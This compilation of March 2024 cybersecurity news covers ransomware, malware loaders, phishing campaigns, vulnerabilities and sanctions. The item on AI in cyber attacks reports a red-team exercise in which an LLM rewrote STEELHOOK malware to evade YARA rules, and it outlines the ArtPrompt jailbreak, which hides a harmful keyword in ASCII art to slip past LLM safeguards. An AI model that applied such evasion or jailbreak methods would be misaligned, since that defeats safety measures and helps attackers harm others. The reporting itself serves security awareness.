The development comes as the AhnLab Security Intelligence Center (ASEC) revealed that vulnerable WebLogic servers located in South Korea are being targeted by adversaries and used them as download servers to distribute a cryptocurrency miner called z0Miner and other tools like fast reverse proxy (FRP).
It also follows the discovery of a malicious campaign that infiltrates AWS instances to create over 6,000 EC2 instances within minutes and deploy a binary associated with a decentralized content delivery network (CDN) known as Meson Network.
The Singapore-based company, which aims to create the "world's largest bandwidth marketplace," works by allowing users to exchange their idle bandwidth and storage resources with Meson for tokens (i.e., rewards).
"This means miners will receive Meson tokens as a reward for providing servers to the Meson Network platform, and the reward will be calculated based on the amount of bandwidth and storage brought into the network," Sysdig said in a technical report published this month.
"It isn't all about mining cryptocurrency anymore. Services like Meson network want to leverage hard drive space and network bandwidth instead of CPU. While Meson may be a legitimate service, this shows that attackers are always on the lookout for new ways to make money."
With cloud environments increasingly becoming a lucrative target for threat actors, it is critical to keep software up to date and monitor for suspicious activity.
Threat intelligence firm Permiso has also released a tool called CloudGrappler, that's built on top of the foundations of cloudgrep and scans AWS and Azure for flagging malicious events related to well-known threat actors.
GitHub Launches AI-Powered Autofix Tool to Assist Devs in Patching Security
Flaws
21.3.24
AI
The Hacker News
GitHub on Wednesday announced that it's making available a feature called code scanning autofix in public beta for all Advanced Security customers to provide targeted recommendations in an effort to avoid introducing new security issues.
"Powered by GitHub Copilot and CodeQL, code scanning autofix covers more than 90% of alert types in JavaScript, Typescript, Java, and Python, and delivers code suggestions shown to remediate more than two-thirds of found vulnerabilities with little or no editing," GitHub's Pierre Tempel and Eric Tooley said.
The capability, first previewed in November 2023, leverages a combination of CodeQL, Copilot APIs, and OpenAI GPT-4 to generate code suggestions. The Microsoft-owned subsidiary also said it plans to add support for more programming languages, including C# and Go, in the future.
Code scanning autofix is designed to help developers resolve vulnerabilities as they code by generating potential fixes as well as providing a natural language explanation when an issue is discovered in a supported language.
These suggestions could go beyond the current file to include changes to several other files and the dependencies that should be added to rectify the problem.
"Code scanning autofix lowers the barrier of entry to developers by combining information on best practices with details of the codebase and alert to suggest a potential fix to the developer," the company said.
"Instead of starting with a search for information about the vulnerability, the developer starts with a code suggestion that demonstrates a potential solution for their codebase."
That said, it's left to the developer to evaluate the recommendations and
determine if it's the right solution and ensure that it does not deviate from
its intended behavior.
GitHub also emphasized the current limitations of the autofix code suggestions,
making it imperative that developers carefully review the changes and the
dependencies before accepting them -
Suggest fixes that are not syntactically correct code changes
Suggest fixes
that are syntactically correct code but are suggested at the incorrect location
Suggest fixes that are syntactically valid but that change the semantics of the
program
Suggest fixes that are fail to address the root cause, or introduce
new vulnerabilities
Suggest fixes that only partially resolve the underlying
flaw
Suggest unsupported or insecure dependencies
Suggest arbitrary
dependencies, leading to possible supply chain attacks
"The system has
incomplete knowledge of the dependencies published in the wider ecosystem," the
company noted. "This can lead to suggestions that add a new dependency on
malicious software that attackers have published under a statistically probable
dependency name."
U.S. Sanctions Russians Behind 'Doppelganger' Cyber Influence Campaign
21.3.24
BigBrothers
The Hacker News
The U.S. Treasury Department's
Office of Foreign Assets Control (OFAC) on Wednesday announced sanctions against
two 46-year-old Russian nationals and the respective companies they own for
engaging in cyber influence operations.
Ilya Andreevich Gambashidze (Gambashidze), the founder of the Moscow-based company Social Design Agency (SDA), and Nikolai Aleksandrovich Tupikin (Tupikin), the CEO and current owner of Russia-based Company Group Structura LLC (Structura), have been accused of providing services to the Russian government in connection to a "foreign malign influence campaign."
The disinformation campaign is tracked by the broader cybersecurity community under the name Doppelganger, which is known to target audiences in Europe and the U.S. using inauthentic news sites and social media accounts.
"SDA and Structura have been identified as key actors of the campaign, responsible for providing [the Government of the Russian Federation] with a variety of services, including the creation of websites designed to impersonate government organizations and legitimate media outlets in Europe," the Treasury said.
Both Gambashidze and Tupikin have been accused of orchestrating a campaign in the Fall of 2022 that created a network of over 60 sites designed to masquerade as legitimate news websites and fake social media accounts to disseminate the content originating from those spoofed sites.
The department said the fake websites were built with an intent to mimic the appearance of their actual counterparts, with the portals including embedded images and working links to the legitimate sites and even impersonated the cookie consent pages as part of efforts to trick visitors.
Furthermore, a closer examination of the two cryptocurrency wallets listed by OFAC as associated with Gambashidze reveals that they have received more than $200,000 worth of USDT on the TRON network, with a significant chunk originating from the now-sanctioned exchange Garantex, Chainalysis said.
"He then cashed out most of his funds to a single deposit address at a mainstream exchange," blockchain analytics firm noted. "These transactions highlight Garantex's continued involvement in the Russian government's illicit activities."
Doppelganger, active since at least February 2022, has been described by Meta as the "largest and the most aggressively-persistent Russian-origin operation."
In December 2023, Recorded Future revealed attempts by the malign network to
leverage generative artificial intelligence (AI) to create inauthentic news
articles and produce scalable influence content.
SDA and Structura, along with Gambashidze, have also been the subject of sanctions imposed by the Council of the European Union as of July 2023 for conducting a digital information manipulation campaign called Recent Reliable News (RRN) aimed at amplifying propaganda declaring support for Russia's war against Ukraine.
"This campaign [...] relies on fake web pages usurping the identity of national media outlets and government websites, as well as fake accounts on social media," the Council said at the time. "This coordinated and targeted information manipulation is part of a broader hybrid campaign by Russia against the E.U. and the member states."
The development comes as the U.S. House of Representatives unanimously passed a bill (Protecting Americans' Data from Foreign Adversaries Act, or H.R.7520) that would bar data brokers from selling Americans' sensitive data to foreign adversaries, counting China, Russia, North Korea, and Iran.
It also arrives a week after Congress passed another bill (Protecting Americans from Foreign Adversary Controlled Applications Act, or H.R.7521) that seeks to force Chinese company ByteDance to divest popular video sharing platform TikTok within six months, or risk facing a ban, due to national security concerns.
Ivanti Releases Urgent Fix for Critical Sentry RCE Vulnerability
21.3.24
Vulnerebility
The Hacker News
Ivanti has disclosed details of a
critical remote code execution flaw impacting Standalone Sentry, urging
customers to apply the fixes immediately to stay protected against potential
cyber threats.
Tracked as CVE-2023-41724, the vulnerability carries a CVSS score of 9.6.
"An unauthenticated threat actor can execute arbitrary commands on the underlying operating system of the appliance within the same physical or logical network," the company said.
The flaw impacts all supported versions 9.17.0, 9.18.0, and 9.19.0, as well as older versions. The company said it has made available a patch (versions 9.17.1, 9.18.1, and 9.19.1) that can be downloaded via the standard download portal.
It credited Vincent Hutsebaut, Pierre Vivegnis, Jerome Nokin, Roberto Suggi Liverani and Antonin B. of NATO Cyber Security Centre for "their collaboration on this issue."
Ivanti emphasized that it's not aware of any customers affected by CVE-2023-41724, and added that "threat actors without a valid TLS client certificate enrolled through EPMM cannot directly exploit this issue on the internet."
Recently disclosed security flaws in Ivanti software have been subject to
exploitation by at least three different suspected China-linked cyber espionage
clusters tracked as UNC5221, UNC5325, and UNC3886, according to Mandiant.
The development comes as SonarSource revealed a mutation cross-site scripting
(mXSS) flaw impacting an open-source email client called Mailspring aka Nylas
Mail (CVE-2023-47479) that could be exploited to bypass sandbox and Content
Security Policy (CSP) protections and achieve code execution when a user replies
to or forwards a malicious email.
"mXSS takes advantage of that by providing a payload that seems innocent
initially when parsing (during the sanitization process) but mutates it to a
malicious one when re-parsing it (in the final stage of displaying the
content)," security researcher Yaniv Nizry said.
Atlassian Releases Fixes for Over 2 Dozen Flaws, Including Critical Bamboo Bug
21.3.24
Vulnerebility
The Hacker News
Atlassian has released patches for
more than two dozen security flaws, including a critical bug impacting Bamboo
Data Center and Server that could be exploited without requiring user
interaction.
Tracked as CVE-2024-1597, the vulnerability carries a CVSS score of 10.0, indicating maximum severity.
Described as an SQL injection flaw, it's rooted in a dependency called org.postgresql:postgresql, as a result of which the company said it "presents a lower assessed risk" despite the criticality.
"This org.postgresql:postgresql dependency vulnerability [...] could allow an unauthenticated attacker to expose assets in your environment susceptible to exploitation which has high impact to confidentiality, high impact to integrity, high impact to availability, and requires no user interaction," Atlassian said.
According to a description of the flaw in the NIST's National Vulnerability Database (NVD), "pgjdbc, the PostgreSQL JDBC Driver, allows attacker to inject SQL if using PreferQueryMode=SIMPLE." The driver versions prior to the ones listed below are impacted -
42.7.2
42.6.1
42.5.5
42.4.4
42.3.9, and
42.2.28 (also fixed in
42.2.28.jre7)
"SQL injection is possible when using the non-default
connection property preferQueryMode=simple in combination with application code
that has a vulnerable SQL that negates a parameter value," the maintainters said
in an advisory last month.
"There is no vulnerability in the driver when using the default query mode. Users that do not override the query mode are not impacted."
The Atlassian vulnerability is said to have been introduced in the following versions of Bamboo Data Center and Server -
8.2.1
9.0.0
9.1.0
9.2.1
9.3.0
9.4.0, and
9.5.0
The company
also emphasized that Bamboo and other Atlassian Data Center products are
unaffected by CVE-2024-1597 as they do not use the PreferQueryMode=SIMPLE in
their SQL database connection settings.
SonarSource security researcher Paul Gerste has been credited with discovering and reporting the flaw. Users are advised to update their instances to the latest version to protect against any potential threats.
New 'Loop DoS' Attack Impacts Hundreds of Thousands of Systems
21.3.24
Attack
The Hacker News
A novel denial-of-service (DoS) attack vector has been found to target application-layer protocols based on User Datagram Protocol (UDP), putting hundreds of thousands of hosts likely at risk.
Called Loop DoS attacks, the approach pairs "servers of these protocols in such a way that they communicate with each other indefinitely," researchers from the CISPA Helmholtz-Center for Information Security said.
UDP, by design, is a connectionless protocol that does not validate source IP addresses, making it susceptible to IP spoofing.
Thus, when attackers forge several UDP packets to include a victim IP address, the destination server responds to the victim (as opposed to the threat actor), creating a reflected denial-of-service (DoS) attack.
The latest study found that certain implementations of the UDP protocol, such as DNS, NTP, TFTP, Active Users, Daytime, Echo, Chargen, QOTD, and Time, can be weaponized to create a self-perpetuating attack loop.
"It pairs two network services in such a way that they keep responding to one another's messages indefinitely," the researchers said. "In doing so, they create large volumes of traffic that result in a denial-of-service for involved systems or networks. Once a trigger is injected and the loop set in motion, even the attackers are unable to stop the attack."
Put simply, given two application servers running a vulnerable version of the protocol, a threat actor can initiate communication with the first server by spoofing the address of the second server, causing the first server to respond to the victim (i.e., the second server) with an error message.
The victim, in turn, will also exhibit similar behavior, sending back another error message to the first server, effectively exhausting each other's resources and making either of the services unresponsive.
"If an error as input creates an error as output, and a second system behaves the same, these two systems will keep sending error messages back and forth indefinitely," Yepeng Pan and Christian Rossow explained.
CISPA said an estimated 300,000 hosts and their networks can be abused to carry out Loop DoS attacks.
While there is currently no evidence that the attack has been weaponized in the wild, the researchers warned that exploitation is trivial and that multiple products from Broadcom, Cisco, Honeywell, Microsoft, MikroTik, and Zyxel are affected.
"Attackers need a single spoofing-capable host to trigger loops," the researchers noted. "As such, it is important to keep up initiatives to filter spoofed traffic, such as BCP38."
TeamCity Flaw Leads to Surge in Ransomware, Cryptomining, and RAT Attacks
20.3.24
Ransom
The Hacker News
Multiple threat actors are
exploiting the recently disclosed security flaws in JetBrains TeamCity software
to deploy ransomware, cryptocurrency miners, Cobalt Strike beacons, and a
Golang-based remote access trojan called Spark RAT.
The attacks entail the exploitation of CVE-2024-27198 (CVSS score: 9.8) that enables an adversary to bypass authentication measures and gain administrative control over affected servers.
"The attackers are then able to install malware that can reach out to its command-and-control (C&C) server and perform additional commands such as deploying Cobalt Strike beacons and remote access trojans (RATs)," Trend Micro said in a new report.
"Ransomware can then be installed as a final payload to encrypt files and demand ransom payments from victims."
Following public disclosure of the flaw earlier this month, it has been weaponized by threat actors associated with BianLian and Jasmin ransomware families, as well as to drop the XMRig cryptocurrency miner and Spark RAT.
Organizations relying on TeamCity for their CI/CD processes are recommended to update their software as soon as possible to safeguard against potential threats.
The development comes as ransomware continues to be both formidable and profitable, with new strains like DoNex, Evil Ant, Lighter, RA World, and WinDestroyer emerging in the wild, even as notorious cybercrime crews like LockBit are still accepting affiliates into their program despite law enforcement actions against them.
WinDestroyer, in particular, stands out for its ability to encrypt files and
render targeted systems unusable with no means to recover the data, raising the
possibility that the threat actors behind it are geopolitically motivated.
"One of the major issues when tackling ransomware crime is the nature of the affiliate program, with actors often working for multiple RaaS outfits at a time," Cisco Talos said. "It's going to take persistent, strategic efforts to significantly damage RaaS operations and weaken the regenerative power of these gangs."
Data shared by the U.S. Federal Bureau of Investigation's (FBI) Internet Crime Complaint Center (IC3) shows that 2,825 ransomware infections were reported in 2023, causing adjusted losses of more than $59.6 million. Of these, 1,193 came from organizations belonging to a critical infrastructure sector.
The top five ransomware variants impacting critical infrastructure in the U.S. include LockBit, BlackCat (aka ALPHV or Noberus), Akira, Royal, and Black Basta.
Besides offering a bigger chunk of the proceeds to court affiliates, the landscape is witnessing increased collaboration between different ransomware groups that share their malicious tooling with each other.
These partnerships also manifest in the form of ghost groups, in which one ransomware operation outsources its skills to another, as seen in the case of Zeon, LockBit, and Akira.
Broadcom-owned Symantec, in a report published last week, revealed that
"ransomware activity remains on an upward trend despite the number of attacks
claimed by ransomware actors decreasing by slightly more than 20% in the fourth
quarter of 2023."
According to statistics published by NCC Group, the total number of ransomware cases in February 2024 increased by 46% from January, up from 285 to 416, led by LockBit (33%), Hunters (10%), BlackCat (9%), Qilin (9%), BianLian (8%), Play (7%), and 8Base (7%).
"Recent law enforcement activity has the potential to polarize the ransomware landscape, creating clusters of smaller RaaS operators that are highly active and harder to detect due to their agility in underground forums and markets," Matt Hull, global head of threat intelligence at NCC Group, said.
"It appears that the attention drawn by the larger 'brand' ransomware, such as LockBit and Cl0p, is leading to new and small generic RaaS affiliate partnerships becoming the norm. As a result, detection and attribution could become harder, and affiliates may easily switch providers due to low entry thresholds and minimal monetary involvement."
This has also been complemented by threat actors finding novel ways to infect victims by mainly exploiting vulnerabilities in public-facing applications and evade detection, as well as refining their tactics by increasingly banking on legitimate software and living-off-the-land (LotL) techniques.
Also popular among ransomware attackers are utilities like TrueSightKiller, GhostDriver, and Terminator, which leverage the Bring Your Own Vulnerable Driver (BYOVD) technique to disable security software.
"BYOVD attacks are attractive to threat actors, as they can provide a means by which to disable AV and EDR solutions at the kernel level," Sophos researchers Andreas Klopsch and Matt Wixey said in a report this month. "The sheer amount of known vulnerable drivers means that attackers have a wealth of options to choose from."
New BunnyLoader Malware Variant Surfaces with Modular Attack Features
20.3.24
Virus
The Hacker News
Cybersecurity researchers have
discovered an updated variant of a stealer and malware loader called BunnyLoader
that modularizes its various functions as well as allow it to evade detection.
"BunnyLoader is dynamically developing malware with the capability to steal information, credentials and cryptocurrency, as well as deliver additional malware to its victims," Palo Alto Networks Unit 42 said in a report published last week.
The new version, dubbed BunnyLoader 3.0, was announced by its developer named Player (or Player_Bunny) on February 11, 2024, with rewritten modules for data theft, reduced payload size, and enhanced keylogging capabilities.
BunnyLoader was first documented by Zscaler ThreatLabz in September 2023, describing it as malware-as-a-service (MaaS) designed to harvest credentials and facilitate cryptocurrency theft. It was initially offered on a subscription basis for $250 per month.
The malware has since undergone frequent updates that are aimed at evading antivirus defenses as well as expanding on its data gathering functions, with BunnyLoader 2.0 released by the end of the same month.
The third generation of BunnyLoader goes a step further by not only incorporating new denial-of-service (DoS) features to mount HTTP flood attacks against a target URL, but also splitting its stealer, clipper, keylogger, and DoS modules into distinct binaries.
"Operators of BunnyLoader can choose to deploy these modules or use BunnyLoader's built-in commands to load their choice of malware," Unit 42 explained.
Infection chains delivering BunnyLoader have also become progressively more sophisticated, leveraging a previously undocumented dropper to loader PureCrypter, which then forks into two separate branches.
While one branch launches the PureLogs loader to ultimately deliver the PureLogs stealer, the second attack sequence drops BunnyLoader to distribute another stealer malware called Meduza.
"In the ever changing landscape of MaaS, BunnyLoader continues to evolve,
demonstrating the need for threat actors to frequently retool to evade
detection," Unit 42 researchers said.
The development comes amid the continued use of SmokeLoader malware (aka Dofoil or Sharik) by a suspected Russian cybercrime crew called UAC-006 to target the Ukrainian government and financial entities. It's known to be active since 2011.
As many as 23 phishing attack waves delivering SmokeLoader were recorded between May and November 2023, according to an exhaustive report published by Ukraine's State Cyber Protection Center (SCPC).
"Primarily a loader with added information-stealing capabilities, SmokeLoader has been linked to Russian cybercrime operations and is readily available on Russian cybercrime forums," Unit 42 said.
Adding to BunnyLoader and SmokeLoader are two new information stealer malware codenamed Nikki Stealer and GlorySprout, the latter of which is developed in C++ and offered for $300 for a lifetime access. According to RussianPanda, the stealer is a clone of Taurus Stealer.
"A notable difference is that GlorySprout, unlike Taurus Stealer, does not download additional DLL dependencies from C2 servers," the researcher said. "Additionally, GlorySprout lacks the Anti-VM feature that is present in Taurus Stealer."
The findings also follow the discovery of a new variant of WhiteSnake Stealer that allows for the theft of critical sensitive data from compromised systems. "This new version has removed the string decryption code and made the code easy to understand," SonicWall said.
Ukraine Arrests Trio for Hijacking Over 100 Million Email and Instagram Accounts
20.3.24
Crime
The Hacker News
The Cyber Police of Ukraine has
arrested three individuals on suspicion of hijacking more than 100 million
emails and Instagram accounts from users across the world.
The suspects, aged between 20 and 40, are said to be part of an organized criminal group living in different parts of the country. If convicted, they face up to 15 years in prison.
The accounts, authorities said, were taken over by carrying out brute-force attacks, which employ trial-and-error methods to guess login credentials. The group operated under the direction of a leader, who distributed the hacking tasks to other members.
The cybercrime group subsequently monetized their ill-gotten credentials by putting them up for sale on dark web forums.
Other threat actors who purchased the information used the compromised accounts to conduct a variety of fraudulent schemes, including those in which scammers reach out to the victim's friends to urgently transfer money to their bank account.
"You can protect your account from this method of hacking by setting up two-factor authentication and using strong passwords," the agency said.
As part of the operation, officials conducted seven searches in Kyiv, Odesa, Vinnytsia, Ivano-Frankivsk, Donetsk, and Kirovohrad, confiscating 70 computers, 14 phones, bank cards, and cash worth more than $3,000.
The development comes as a U.S. national pleaded guilty to breaching over a dozen entities in the U.S., including a medical clinic in Griffin, and exfiltrating the personal information of more than 132,000 individuals. He is scheduled for sentencing on June 18, 2024.
Robert Purbeck (aka Lifelock or Studmaster) "aggravated his crimes by weaponizing sensitive data in an egregious attempt to extort his victims," U.S. Attorney Ryan K. Buchanan said.
According to the U.S. Department of Justice (DoJ), Purbeck, who pleaded guilty today to federal charges of computer fraud and abuse, purchased access to the clinic's computer server from the darknet in 2017, leveraging it to siphon medical records and other documents that contained data pertaining to over 43,000 individuals, such as names, addresses, birthdates, and social security numbers.
The defendant also bought credentials associated with the City of Newnan, Georgia Police Department server on an underground marketplace. He then plundered records consisting of police reports and documents that had information belonging to no less than 14,000 people.
As part of the plea agreement, Purbeck agreed to pay more than $1 million in restitution to the impacted 19 victims. He was indicted by a federal jury in March 2021.
U.S. EPA Forms Task Force to Protect Water Systems from Cyberattacks
20.3.24
BigBrothers
The Hacker News
The U.S. Environmental Protection
Agency (EPA) said it's forming a new "Water Sector Cybersecurity Task Force" to
devise methods to counter the threats faced by the water sector in the country.
"In addition to considering the prevalent vulnerabilities of water systems to cyberattacks and the challenges experienced by some systems in adopting best practices, this Task Force in its deliberations would seek to build upon existing collaborative products," the EPA said.
In a letter sent to all U.S. Governors, EPA Administrator Michael Regan and National Security Advisor Jake Sullivan highlighted the need to secure water and wastewater systems (WWS) from cyber attacks that could disrupt access to clean and safe drinking water.
At least two threat actors have been linked to intrusions targeting the nation's water systems, including those by an Iranian hacktivist group named Cyber Av3ngers as well as the China-linked Volt Typhoon, which has targeted communications, energy, transportation, and water and wastewater systems sectors in the U.S. and Guam for at least five years.
"Drinking water and wastewater systems are an attractive target for cyberattacks because they are a lifeline critical infrastructure sector but often lack the resources and technical capacity to adopt rigorous cybersecurity practices," Regan and Sullivan said.
The development coincides with the release of a new fact sheet from the U.S. Cybersecurity and Infrastructure Security Agency (CISA), urging critical infrastructure entities to defend against the "urgent risk posed by Volt Typhoon" by implementing secure by-design principles, robust logging, safeguarding the supply chain, and increasing awareness of social engineering tactics.
"Volt Typhoon have been pre-positioning themselves on U.S. critical infrastructure organizations' networks to enable disruption or destruction of critical services in the event of increased geopolitical tensions and/or military conflict with the United States and its allies," the agency cautioned.
Cybersecurity firm SentinelOne, in a report published last month, revealed how China has launched an offensive media strategy to propagate "unsubstantiated" narratives around U.S. hacking operations for over two years.
"Repeating China's allegations helps the [People's Republic of China] shape global public opinion of the U.S. China wants to see the world recognize the U.S. as the 'empire of hacking,'" Sentinel One's China-focused consultant Dakota Cary said.
"The fact that China is lodging allegations of US espionage operations is still notable, providing insight into the relationship between the US and China, even if China does not support its claims."
From Deepfakes to Malware: AI's Expanding Role in Cyber Attacks
19.3.24
AI
The Hacker News
Large language models (LLMs)
powering artificial intelligence (AI) tools today could be exploited to develop
self-augmenting malware capable of bypassing YARA rules.
"Generative AI can be used to evade string-based YARA rules by augmenting the source code of small malware variants, effectively lowering detection rates," Recorded Future said in a new report shared with The Hacker News.
The findings are part of a red teaming exercise designed to uncover malicious use cases for AI technologies, which are already being experimented with by threat actors to create malware code snippets, generate phishing emails, and conduct reconnaissance on potential targets.
The cybersecurity firm said it submitted to an LLM a known piece of malware called STEELHOOK that's associated with the APT28 hacking group, alongside its YARA rules, asking it to modify the source code to sidestep detection such the original functionality remained intact and the generated source code was syntactically free of errors.
Armed with this feedback mechanism, the altered malware generated by the LLM made it possible to avoid detections for simple string-based YARA rules.
There are limitations to this approach, the most prominent being the amount of text a model can process as input at one time, which makes it difficult to operate on larger code bases.
Besides modifying malware to fly under the radar, such AI tools could be used to create deepfakes impersonating senior executives and leaders and conduct influence operations that mimic legitimate websites at scale.
Furthermore, generative AI is expected to expedite threat actors' ability to carry out reconnaissance of critical infrastructure facilities and glean information that could be of strategic use in follow-on attacks.
"By leveraging multimodal models, public images and videos of ICS and manufacturing equipment, in addition to aerial imagery, can be parsed and enriched to find additional metadata such as geolocation, equipment manufacturers, models, and software versioning," the company said.
Indeed, Microsoft and OpenAI warned last month that APT28 used LLMs to "understand satellite communication protocols, radar imaging technologies, and specific technical parameters," indicating efforts to "acquire in-depth knowledge of satellite capabilities."
It's recommended that organizations scrutinize publicly accessible images and videos depicting sensitive equipment and scrub them, if necessary, to mitigate the risks posed by such threats.
The development comes as a group of academics have found that it's possible to jailbreak LLM-powered tools and produce harmful content by passing inputs in the form of ASCII art (e.g., "how to build a bomb," where the word BOMB is written using characters "*" and spaces).
The practical attack, dubbed ArtPrompt, weaponizes "the poor performance of LLMs in recognizing ASCII art to bypass safety measures and elicit undesired behaviors from LLMs."
Hackers Exploiting Popular Document Publishing Sites for Phishing Attacks
19.3.24
Exploit
The Hacker News
Threat actors are leveraging
digital document publishing (DDP) sites hosted on platforms like FlipSnack,
Issuu, Marq, Publuu, RelayTo, and Simplebooklet for carrying out phishing,
credential harvesting, and session token theft, once again underscoring how
threat actors are repurposing legitimate services for malicious ends.
"Hosting phishing lures on DDP sites increases the likelihood of a successful phishing attack, since these sites often have a favorable reputation, are unlikely to appear on web filter blocklists, and may instill a false sense of security in users who recognize them as familiar or legitimate," Cisco Talos researcher Craig Jackson said last week.
While adversaries have used popular cloud-based services such as Google Drive, OneDrive, Dropbox, SharePoint, DocuSign, and Oneflow to host phishing documents in the past, the latest development marks an escalation designed to evade email security controls.
DDP services allow users to upload and share PDF files in a browser-based interactive flipbook format, adding page flip animations and other skeuomorphic effects to any catalog, brochure, or magazine.
Threat actors have been found to abuse the free tier or a no-cost trial period offered by these services to create multiple accounts and publish malicious documents.
Besides exploiting their favorable domain reputation, the attackers take advantage of the fact that DDP sites facilitate transient file hosting, thereby allowing published content to automatically become unavailable after a predefined expiration date and time.
What's more, productivity features baked into DDP sites like Publuu could act as
a deterrent, preventing the extraction and detection of malicious links in
phishing messages.
In the incidents analyzed by Cisco Talos, DDP sites are integrated into the attack chain in the secondary or intermediate stage, typically by embedding a link to a document hosted on a legitimate DDP site in a phishing email.
The DDP-hosted document serves as a gateway to an external, adversary-controlled site either directly by clicking on a link included in the decoy file, or through a series of redirects that also require solving CAPTCHAs to thwart automated analysis efforts.
The final landing page is a bogus site mimicking the Microsoft 365 login page, thus allowing the attackers to steal credentials or session tokens.
"DDP sites could represent a blind spot for defenders, because they are unfamiliar to trained users and unlikely to be flagged by email and web content filtering controls," Jackson said.
"DDP sites create advantages for threat actors seeking to thwart contemporary phishing protections. The same features and benefits that attract legitimate users to these sites can be abused by threat actors to increase the efficacy of a phishing attack."
Suspected Russian Data-Wiping 'AcidPour' Malware Targeting Linux x86 Devices
19.3.24
Virus
The Hacker News
A new variant of a data wiping
malware called AcidRain has been detected in the wild that's specifically
designed for targeting Linux x86 devices.
The malware, dubbed AcidPour, is compiled for Linux x86 devices, SentinelOne's Juan Andres Guerrero-Saade said in a series of posts on X.
"The new variant [...] is an ELF binary compiled for x86 (not MIPS) and while it refers to similar devices/strings, it's a largely different codebase," Guerrero-Saade noted.
AcidRain first came to light in the early days of the Russo-Ukrainian war, with the malware deployed against KA-SAT modems from U.S. satellite company Viasat.
An ELF binary compiled for MIPS architectures is capable of wiping the filesystem and different known storage device files by recursively iterating over common directories for most Linux distributions.
The cyber attack was subsequently attributed to Russia by the Five Eyes nations, along with Ukraine and the European Union.
AcidPour, as the new variant is called, is designed to erase content from RAID arrays and Unsorted Block Image (UBI) file systems through the addition of file paths like "/dev/dm-XX" and "/dev/ubiXX," respectively.
It's currently not clear who the intended victims are, although SentinelOne said it notified Ukrainian agencies. The exact scale of the attacks is presently unknown.
The discovery once again underscores the use of wiper malware to cripple targets, even as threat actors are diversifying their attack methods for maximum impact.
New Phishing Attack Uses Clever Microsoft Office Trick to Deploy NetSupport RAT
19.3.24
Phishing
The Hacker News
A new phishing campaign is targeting U.S. organizations with the intent to deploy a remote access trojan called NetSupport RAT.
Israeli cybersecurity company Perception Point is tracking the activity under the moniker Operation PhantomBlu.
"The PhantomBlu operation introduces a nuanced exploitation method, diverging from NetSupport RAT's typical delivery mechanism by leveraging OLE (Object Linking and Embedding) template manipulation, exploiting Microsoft Office document templates to execute malicious code while evading detection," security researcher Ariel Davidpur said.
NetSupport RAT is a malicious offshoot of a legitimate remote desktop tool known as NetSupport Manager, allowing threat actors to conduct a spectrum of data gathering actions on a compromised endpoint.
The starting point is a salary-themed phishing email that purports to be from the accounting department and urges recipients to open the attached Microsoft Word document to view the "monthly salary report."
A closer analysis of the email message headers – particularly the Return-Path and Message-ID fields – shows that the attackers use a legitimate email marketing platform called Brevo (formerly Sendinblue) to send the emails.
The Word document, upon opening, instructs the victim to enter a password provided in the email body and enable editing, followed by double-clicking a printer icon embedded in the doc to view the salary graph.
Doing so opens a ZIP archive file ("Chart20072007.zip") containing one Windows
shortcut file, which functions as a PowerShell dropper to retrieve and execute a
NetSupport RAT binary from a remote server.
"By using encrypted .docs to deliver the NetSupport RAT via OLE template and template injection, PhantomBlu marks a departure from the conventional TTPs commonly associated with NetSupport RAT deployments," Davidpur said, adding the updated technique "showcases PhantomBlu's innovation in blending sophisticated evasion tactics with social engineering."
Growing Abuse of Cloud Platforms and Popular CDNs#
The development comes as
Resecurity revealed that threat actors are increasingly abusing public cloud
services like Dropbox, GitHub, IBM Cloud, and Oracle Cloud Storage, as well as
Web 3.0 data-hosting platforms built on the InterPlanetary File System (IPFS)
protocol such as Pinata to generate fully undetectable (FUD) phishing URLs using
off-the-shelf kits.
Such FUD links are offered on Telegram by underground vendors like BulletProofLink, FUDLINKSHOP, FUDSENDER, ONNX, and XPLOITRVERIFIER for prices starting at $200 per month as part of a subscription model. These links are further secured behind antibot barriers to filter incoming traffic and evade detection.
Also complementing these services are tools like HeartSender that make it possible to distribute the generated FUD links at scale. The Telegram group associated with HeartSender has nearly 13,000 subscribers.
"FUD Links represent the next step in [phishing-as-a-service] and malware-deployment innovation," the company said, noting attackers are "repurposing high-reputation infrastructure for malicious use cases."
"One recent malicious campaign, which leveraged the Rhadamanthys Stealer to target the oil and gas sector, used an embedded URL that exploited an open redirect on legitimate domains, primarily Google Maps and Google Images. This domain-nesting technique makes malicious URLs less noticeable and more likely to entrap victims."
E-Root Marketplace Admin Sentenced to 42 Months for Selling 350K Stolen
Credentials
19.3.24
Crime
The Hacker News
A 31-year-old Moldovan national has
been sentenced to 42 months in prison in the U.S. for operating an illicit
marketplace called E-Root Marketplace that offered for sale hundreds of
thousands of compromised credentials, the Department of Justice (DoJ) announced.
Sandu Boris Diaconu was charged with conspiracy to commit access device and computer fraud and possession of 15 or more unauthorized access devices. He pleaded guilty on December 1, 2023.
"The E-Root Marketplace operated across a widely distributed network and took steps to hide the identities of its administrators, buyers, and sellers," the DoJ said last week.
"Buyers could search for compromised computer credentials on E-Root, such as usernames and passwords that would allow buyers to access remote computers for purposes of stealing private information or manipulating the contents of the remote computer."
Prospective customers could also search for RDP and SSH credentials based on various filter criteria such as price, geographic location, internet service provider, and operating system.
In an attempt to hide the transaction trails, the marketplace provided an online payment system called Perfect Money, which further made it possible to convert Bitcoin to and from Perfect Money. The infrastructure associated with E-Root and Perfect Money has since been seized by law enforcement as of late 2020.
More than 350,000 credentials are estimated to have been advertised for sale on the illegal marketplace, with many of the victims subjected to ransomware attacks and identity tax fraud schemes.
Diaconu, who served as the administrator between January 2015 and February 2020, was arrested in the U.K. in May 2021 while trying to flee the country. He was extradited to the U.S. in late October 2023.
"The E-Root Marketplace operated across a widely distributed network and took steps to hide the identities of its administrators, buyers, and sellers," the DoJ said.
The development comes as the DoJ also said it's recovering $2.3 million worth of cryptocurrency linked to a pig butchering romance scam that victimized at least 37 individuals across the U.S.
Such schemes seek to build trust with victims in online communications and then entice them into investing in a cryptocurrency scam under the guise of quick returns. Instead, the funds are diverted to the scammers' wallets, leading to financial losses.
According to Web3 anti-fraud company Scam Sniffer, approximately 57,000 victims have lost about $47 million to crypto phishing scams in the month of February 2024 alone.
"Compared to January, the number of victims who lost over $1 million decreased by 75%," it said in a series of posts on X (formerly Twitter). "Most victims were lured to phishing websites through phishing comments from impersonated Twitter accounts."
New DEEP#GOSU Malware Campaign Targets Windows Users with Advanced Tactics
19.3.24
Virus
The Hacker News
A new elaborate attack campaign has been observed employing PowerShell and VBScript malware to infect Windows systems and harvest sensitive information.
Cybersecurity company Securonix, which dubbed the campaign DEEP#GOSU, said it's likely associated with the North Korean state-sponsored group tracked as Kimsuky.
